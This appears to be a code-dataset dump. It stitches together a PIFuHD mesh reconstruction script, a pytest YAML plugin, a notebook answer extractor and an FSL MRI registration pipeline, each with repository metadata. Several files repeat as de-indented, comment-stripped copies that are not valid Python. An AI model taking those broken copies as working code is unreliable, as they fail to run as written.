from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct a mesh from the network and save it colored by surface normals.

    Filters the network with the global/local images, runs marching cubes at
    resolution `res` inside the data's bounding box, colors each vertex with
    its predicted normal (mapped from [-1, 1] to [0, 1]), and writes an OBJ
    plus a PNG of the input image(s) next to `save_path`.
    """
    image_tensor_global = data['img_512'].to(device=cuda)
    image_tensor = data['img'].to(device=cuda)
    calib_tensor = data['calib'].to(device=cuda)

    net.filter_global(image_tensor_global)
    net.filter_local(image_tensor[:, None])

    # Best effort: append predicted front/back normal maps to the saved image
    # strip when the generator exposes them (older checkpoints may not).
    try:
        if net.netG.netF is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
    except:
        pass

    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Save the (de-normalized, BGR) input images side by side as a PNG.
        save_img_path = save_path[:-4] + '.png'
        save_img_list = []
        for v in range(image_tensor_global.shape[0]):
            save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            save_img_list.append(save_img)
        save_img = np.concatenate(save_img_list, axis=1)
        cv2.imwrite(save_img_path, save_img)

        verts, faces, _, _ = reconstruction(
            net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()

        # Evaluate vertex normals in chunks to bound peak memory.
        color = np.zeros(verts.shape)
        interval = 50000
        for i in range(len(color) // interval + 1):
            left = i * interval
            # BUG FIX: the last chunk previously used right = -1, which slices
            # color[left:-1] and silently left the final vertex uncolored.
            right = min((i + 1) * interval, len(color))
            if left >= right:
                continue
            net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:, None], calib_tensor)
            # Map normals from [-1, 1] to [0, 1] for use as vertex colors.
            nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
            color[left:right] = nml.T
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort export: report the failure but don't abort the batch.
        print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct a mesh and save it colored by sampling the input image.

    Like gen_mesh, but instead of predicted normals each vertex is colored by
    projecting it into the (local) input image and sampling the pixel there.
    Also writes a PNG of the input image(s) next to `save_path`.
    """
    image_tensor_global = data['img_512'].to(device=cuda)
    image_tensor = data['img'].to(device=cuda)
    calib_tensor = data['calib'].to(device=cuda)
    net.filter_global(image_tensor_global)
    net.filter_local(image_tensor[:,None])
    # Best effort: append front/back normal maps to the saved image strip
    # when the generator exposes them (older checkpoints may not).
    try:
        if net.netG.netF is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
    except:
        pass
    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Save the (de-normalized, BGR) input images side by side as a PNG.
        save_img_path = save_path[:-4] + '.png'
        save_img_list = []
        for v in range(image_tensor_global.shape[0]):
            save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            save_img_list.append(save_img)
        save_img = np.concatenate(save_img_list, axis=1)
        cv2.imwrite(save_img_path, save_img)
        verts, faces, _, _ = reconstruction(
            net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
        # if this returns error, projection must be defined somewhere else
        xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
        uv = xyz_tensor[:, :2, :]
        # Sample the input image at each projected vertex; map [-1,1] -> [0,1].
        color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
        color = color * 0.5 + 0.5
        # When a world calibration is provided, move verts back to world space.
        if 'calib_world' in data:
            calib_world = data['calib_world'].numpy()[0]
            verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort export: report the failure but don't abort the batch.
        print(e)
def recon(opt, use_rect=False):
    """Load a trained PIFuHD checkpoint and reconstruct a mesh per test image.

    Resolves the checkpoint path from `opt`, restores the saved options
    (keeping the caller's data/output paths), builds the coarse + fine
    networks, and writes one colored OBJ per dataset entry under
    results_path/name/recon. `use_rect` selects the bbox-based dataset
    instead of the keypoint-based one.
    """
    # load checkpoints: explicit path wins, else latest/epoch-numbered file.
    state_dict_path = None
    if opt.load_netMR_checkpoint_path is not None:
        state_dict_path = opt.load_netMR_checkpoint_path
    elif opt.resume_epoch < 0:
        state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
        opt.resume_epoch = 0
    else:
        state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
    start_id = opt.start_id
    end_id = opt.end_id
    cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
    state_dict = None
    if state_dict_path is not None and os.path.exists(state_dict_path):
        print('Resuming from ', state_dict_path)
        state_dict = torch.load(state_dict_path, map_location=cuda)
        print('Warning: opt is overwritten.')
        # Replace opt with the options saved in the checkpoint, but keep the
        # caller-supplied data root, resolution, output path and load size.
        dataroot = opt.dataroot
        resolution = opt.resolution
        results_path = opt.results_path
        loadSize = opt.loadSize
        opt = state_dict['opt']
        opt.dataroot = dataroot
        opt.resolution = resolution
        opt.results_path = results_path
        opt.loadSize = loadSize
    else:
        raise Exception('failed loading state dict!', state_dict_path)
    # parser.print_options(opt)
    if use_rect:
        test_dataset = EvalDataset(opt)
    else:
        test_dataset = EvalWPoseDataset(opt)
    print('test data size: ', len(test_dataset))
    projection_mode = test_dataset.projection_mode
    # Coarse (global) network wrapped by the multi-resolution (fine) network.
    opt_netG = state_dict['opt_netG']
    netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
    netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
    def set_eval():
        # Only the coarse network is switched to eval mode here.
        netG.eval()
    # load checkpoints
    netMR.load_state_dict(state_dict['model_state_dict'])
    os.makedirs(opt.checkpoints_path, exist_ok=True)
    os.makedirs(opt.results_path, exist_ok=True)
    os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
    # Negative ids mean "from the start" / "to the end" of the dataset.
    if start_id < 0:
        start_id = 0
    if end_id < 0:
        end_id = len(test_dataset)
    ## test
    with torch.no_grad():
        set_eval()
        print('generate mesh (test) ...')
        for i in tqdm(range(start_id, end_id)):
            if i >= len(test_dataset):
                break
            # for multi-person processing, set it to False
            if True:
                test_data = test_dataset[i]
                save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
                print(save_path)
                gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
            else:
                # Multi-person branch: reconstruct each detected person.
                for j in range(test_dataset.get_n_person(i)):
                    test_dataset.person_id = j
                    test_data = test_dataset[i]
                    save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
                    gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
    """Parse CLI options with the module-level BaseOptions parser and run recon."""
    recon(parser.parse(args), use_rect)


if __name__ == '__main__':
    reconWrapper()
| 36.075556 | 127 | 0.637797 |
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
color = np.zeros(verts.shape)
interval = 50000
for i in range(len(color) // interval + 1):
left = i * interval
if i == len(color) // interval:
right = -1
else:
right = (i + 1) * interval
net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
color[left:right] = nml.T
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct one mesh and color its vertices by sampling the input image.

    Same pipeline as ``gen_mesh`` but vertex colors come from projecting each
    vertex into the local input image ('img') instead of predicted normals,
    and the mesh is optionally mapped back to world space via 'calib_world'.

    Parameters mirror ``gen_mesh``; ``save_path`` is the output ``.obj`` and
    must end in a 4-character extension (``[:-4]`` is used to derive the
    preview ``.png`` path). ``components`` is unused here.
    """
    image_tensor_global = data['img_512'].to(device=cuda)
    image_tensor = data['img'].to(device=cuda)
    calib_tensor = data['calib'].to(device=cuda)
    net.filter_global(image_tensor_global)
    # filter_local expects an extra view dimension, hence the [:, None].
    net.filter_local(image_tensor[:, None])
    try:
        # Append front/back normal predictions (if present) to the preview
        # stack. Best-effort: any failure is ignored.
        if net.netG.netF is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
    except:
        pass
    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Side-by-side preview of inputs: [-1, 1] CHW RGB -> [0, 255] HWC BGR.
        save_img_path = save_path[:-4] + '.png'
        save_img_list = []
        for v in range(image_tensor_global.shape[0]):
            save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            save_img_list.append(save_img)
        save_img = np.concatenate(save_img_list, axis=1)
        cv2.imwrite(save_img_path, save_img)
        verts, faces, _, _ = reconstruction(
            net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
        # Project vertices into the image plane and sample per-vertex colors.
        xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
        uv = xyz_tensor[:, :2, :]
        color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
        # Sampled values are in [-1, 1]; remap to [0, 1] for OBJ colors.
        color = color * 0.5 + 0.5
        if 'calib_world' in data:
            # Undo the world->camera calibration so the saved mesh lives in
            # the original world coordinate frame (homogeneous transform).
            calib_world = data['calib_world'].numpy()[0]
            verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:, :1])], 1), inv(calib_world).T)[:, :3]
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort batch processing: log and continue with the next sample.
        print(e)
def recon(opt, use_rect=False):
    """Load a trained multi-level PIFu checkpoint and reconstruct meshes for
    every sample in the evaluation dataset.

    Parameters
    ----------
    opt : options namespace (from BaseOptions.parse)
        Note: on checkpoint load, ``opt`` is *replaced* by the options stored
        in the checkpoint; only dataroot/resolution/results_path/loadSize are
        carried over from the caller's options.
    use_rect : bool
        If True use EvalDataset (rectangle crops), otherwise
        EvalWPoseDataset (pose-based crops).

    Raises
    ------
    Exception
        If no usable checkpoint file is found.
    """
    # Pick the checkpoint: explicit path > latest > specific epoch.
    state_dict_path = None
    if opt.load_netMR_checkpoint_path is not None:
        state_dict_path = opt.load_netMR_checkpoint_path
    elif opt.resume_epoch < 0:
        state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
        opt.resume_epoch = 0
    else:
        state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
    start_id = opt.start_id
    end_id = opt.end_id
    cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
    state_dict = None
    if state_dict_path is not None and os.path.exists(state_dict_path):
        print('Resuming from ', state_dict_path)
        state_dict = torch.load(state_dict_path, map_location=cuda)
        print('Warning: opt is overwritten.')
        # Preserve the caller's runtime settings across the opt swap.
        dataroot = opt.dataroot
        resolution = opt.resolution
        results_path = opt.results_path
        loadSize = opt.loadSize
        opt = state_dict['opt']
        opt.dataroot = dataroot
        opt.resolution = resolution
        opt.results_path = results_path
        opt.loadSize = loadSize
    else:
        raise Exception('failed loading state dict!', state_dict_path)
    if use_rect:
        test_dataset = EvalDataset(opt)
    else:
        test_dataset = EvalWPoseDataset(opt)
    print('test data size: ', len(test_dataset))
    projection_mode = test_dataset.projection_mode
    # Rebuild the networks with the options stored in the checkpoint.
    opt_netG = state_dict['opt_netG']
    netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
    netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)

    def set_eval():
        # Only the coarse network is switched to eval mode here; netMR is
        # used as loaded (matches the original behavior).
        netG.eval()

    netMR.load_state_dict(state_dict['model_state_dict'])
    os.makedirs(opt.checkpoints_path, exist_ok=True)
    os.makedirs(opt.results_path, exist_ok=True)
    os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
    # Clamp the requested sample range to the dataset.
    if start_id < 0:
        start_id = 0
    if end_id < 0:
        end_id = len(test_dataset)
    # FIX: was the corrupted token 'ith torch.no_grad():' (SyntaxError).
    with torch.no_grad():
        set_eval()
        print('generate mesh (test) ...')
        for i in tqdm(range(start_id, end_id)):
            if i >= len(test_dataset):
                break
            if True:
                # Single-person path (default). The dead `else` branch below
                # is a manual toggle for multi-person inputs — presumably
                # flipped by hand when needed; confirm before removing.
                test_data = test_dataset[i]
                save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
                print(save_path)
                gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
            else:
                for j in range(test_dataset.get_n_person(i)):
                    test_dataset.person_id = j
                    test_data = test_dataset[i]
                    save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
                    gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
    """Parse command-line options via the module-level parser and run recon().

    ``args`` is forwarded to ``parser.parse`` (None means use sys.argv);
    ``use_rect`` selects the rectangle-crop evaluation dataset.
    """
    parsed_options = parser.parse(args)
    recon(parsed_options, use_rect)
if __name__ == '__main__':
    # Script entry point: parse options from sys.argv and run reconstruction.
    reconWrapper()
| true | true |
f72ee1276e038c14fc8978d9c956dd65a321b3bd | 1,588 | py | Python | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | import yaml, pytest
def pytest_collect_file(parent, path):
    """pytest collection hook: collect ``test*.yml`` files as YamlFile nodes.

    Returns None for every other path so pytest falls back to its default
    collection behavior.
    """
    is_yaml_test = path.ext == ".yml" and path.basename.startswith("test")
    if not is_yaml_test:
        return None
    return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
    """Raised when a YAML test spec is malformed or its check fails."""
class YamlFile(pytest.File):
    """A collected ``test*.yml`` file; every top-level entry is one test."""

    def collect(self):
        """Yield one YamlItem per spec mapping in the YAML document."""
        specs = yaml.safe_load(self.fspath.open())
        for entry in specs:
            yield YamlItem.from_parent(self, name=entry["name"], spec=entry)
class YamlItem(pytest.Item):
    """One executable check described by a single YAML spec mapping."""

    def __init__(self, name, parent, spec):
        super().__init__(name, parent)
        self.spec = spec

    def runtest(self):
        """Validate the spec and run the (pseudo) compression check."""
        spec = self.spec
        test_type = spec.get("type")
        if test_type != "check-compression":
            raise YamlException(f"unknown test type: {test_type}")
        codec = spec.get("codec")
        if codec != "mp3":
            raise YamlException(f"unknown codec: {codec}")
        # pseudo check: a real implementation would measure the file.
        inputfile = spec.get("inputfile")
        compression = spec.get("compression")
        real_comp = "15%"
        if compression == real_comp:
            return
        raise YamlException(
            f"compression of {inputfile} was {real_comp}, "
            f"expected {compression}")

    def repr_failure(self, excinfo):
        """Render YamlException failures compactly; defer everything else."""
        if not isinstance(excinfo.value, YamlException):
            return super().repr_failure(excinfo)
        return f"spec failed: {excinfo.value}"

    def reportinfo(self):
        return self.fspath, 0, f"usecase: {self.name}"
| 31.76 | 66 | 0.61398 | import yaml, pytest
def pytest_collect_file(parent, path):
if path.ext == ".yml" and path.basename.startswith("test"):
return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
class YamlFile(pytest.File):
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for spec in raw:
name = spec["name"]
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, name, parent, spec):
super().__init__(name, parent)
self.spec = spec
def runtest(self):
test_type = self.spec.get("type")
if test_type != "check-compression":
raise YamlException(f"unknown test type: {test_type}")
codec = self.spec.get("codec")
if codec != "mp3":
raise YamlException(f"unknown codec: {codec}")
inputfile = self.spec.get("inputfile")
compression = self.spec.get("compression")
real_comp = "15%"
if compression != real_comp:
raise YamlException(
f"compression of {inputfile} was {real_comp}, "
f"expected {compression}")
def repr_failure(self, excinfo):
if isinstance(excinfo.value, YamlException):
return f"spec failed: {excinfo.value}"
return super().repr_failure(excinfo)
def reportinfo(self):
return self.fspath, 0, f"usecase: {self.name}"
| true | true |
f72ee154024e635c3e3a687f0aa84471ed485cdc | 594 | py | Python | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 19 | 2017-11-06T03:19:37.000Z | 2020-12-05T07:20:52.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 1 | 2017-07-27T17:58:38.000Z | 2017-11-02T07:22:44.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 4 | 2017-12-27T11:05:48.000Z | 2021-03-08T17:12:11.000Z | import json
import os
# Scan every Jupyter notebook in the current directory and copy its
# free-response answer cells into a plain-text file per notebook.
files = os.listdir()
for file in files:
    if file.endswith('.ipynb'):
        answers = ''
        with open(file) as data:
            nb = json.load(data)
        # Notebook JSON: 'cells' is a list of dicts with cell_type/source.
        for cell in nb['cells']:
            if cell['cell_type'] == 'markdown':
                if 'source' in cell and len(cell['source']) > 0:
                    # Answer cells are marked by this blue-font prefix.
                    if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
                        answers += ''.join(cell['source']) + '\n'
        # file[:-6] strips the '.ipynb' extension.
        f = open('responses for ' + file[:-6] + '.txt', 'w')
        f.write(answers)
f.close() | 37.125 | 83 | 0.476431 | import json
import os
files = os.listdir()
for file in files:
if file.endswith('.ipynb'):
answers = ''
with open(file) as data:
nb = json.load(data)
for cell in nb['cells']:
if cell['cell_type'] == 'markdown':
if 'source' in cell and len(cell['source']) > 0:
if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
answers += ''.join(cell['source']) + '\n'
f = open('responses for ' + file[:-6] + '.txt', 'w')
f.write(answers)
f.close() | true | true |
f72ee175ab02cfd09b428ee248b15c9490ae2b60 | 4,403 | py | Python | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | 1 | 2020-09-23T00:57:20.000Z | 2020-09-23T00:57:20.000Z | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null |
import os
def _run_wsl(cmd):
    """Normalize path separators and execute *cmd* in the WSL bash shell.

    Replaces the repeated ``cmd = cmd.replace(os.sep, '/'); os.system(cmd)``
    pairs. NOTE(review): os.system with an interpolated shell string is fine
    for this trusted local pipeline but unsafe for untrusted file names.
    """
    os.system(cmd.replace(os.sep, '/'))


subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'

# for aal
#atlas_template = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_template.nii'
#atlas_template = atlas_template.replace('C:', '/mnt/c')
#atlas_label = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_atlas.nii'
#atlas_label = atlas_label.replace('C:', '/mnt/c')
#for megaatlas:
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name

## Registration from MPRAGE to 1st CHARMED scan using inverse matrix of CHARMED to MPRAGE registration:
# From CHARMED to MPRAGE:
subj_mprage = subj_folder + mprage_file_name
subj_first_charmed = subj_folder + first_charmed_file_name
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] + '.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
_run_wsl(cmd)
# Creation of inverse matrix:
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
_run_wsl(cmd)
# From MPRAGE to CHARMED using the inverse matrix:
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
_run_wsl(cmd)

## BET for registered MPRAGE and mni template:
# BET for registered MPRAGE:
out_brain = out_registered[:-4] + '_brain'
cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain, '-f 0.40', '-g 0.20')
_run_wsl(cmd)
# BET for mni template:
# if not performed before, run:
#atlas_brain = atlas_template[:-4] + '_brain'
#cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(atlas_template[:-4], atlas_brain,'-f 0.45','-g -0.1')
#_run_wsl(cmd)

## Registration from MNI to registered MPRAGE:
# flirt for MNI to registered MPRAGE for primary guess:
options = r'-bins 256 -cost corratio -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder + 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
_run_wsl(cmd)
# fnirt for MNI based on flirt results:
#warp_name = subj_folder + 'atlas2subj.nii'
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
_run_wsl(cmd)
# apply fnirt warp on atlas template:
atlas_registered = os.path.join(subj_folder + 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
_run_wsl(cmd)
# apply fnirt warp on atlas labels:
atlas_labels_registered = os.path.join(subj_folder + 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
_run_wsl(cmd)

## FAST segmentation:
options = r'-t 1 -n 3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
_run_wsl(cmd)

print('Finished file prep for ' + subj_name[:-1])
| 41.537736 | 156 | 0.712242 |
import os
subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name
ame
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] +'.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
md = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain,'-f 0.40','-g 0.20')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
rchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder+ 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_registered = os.path.join(subj_folder+ 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_labels_registered = os.path.join(subj_folder+ 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
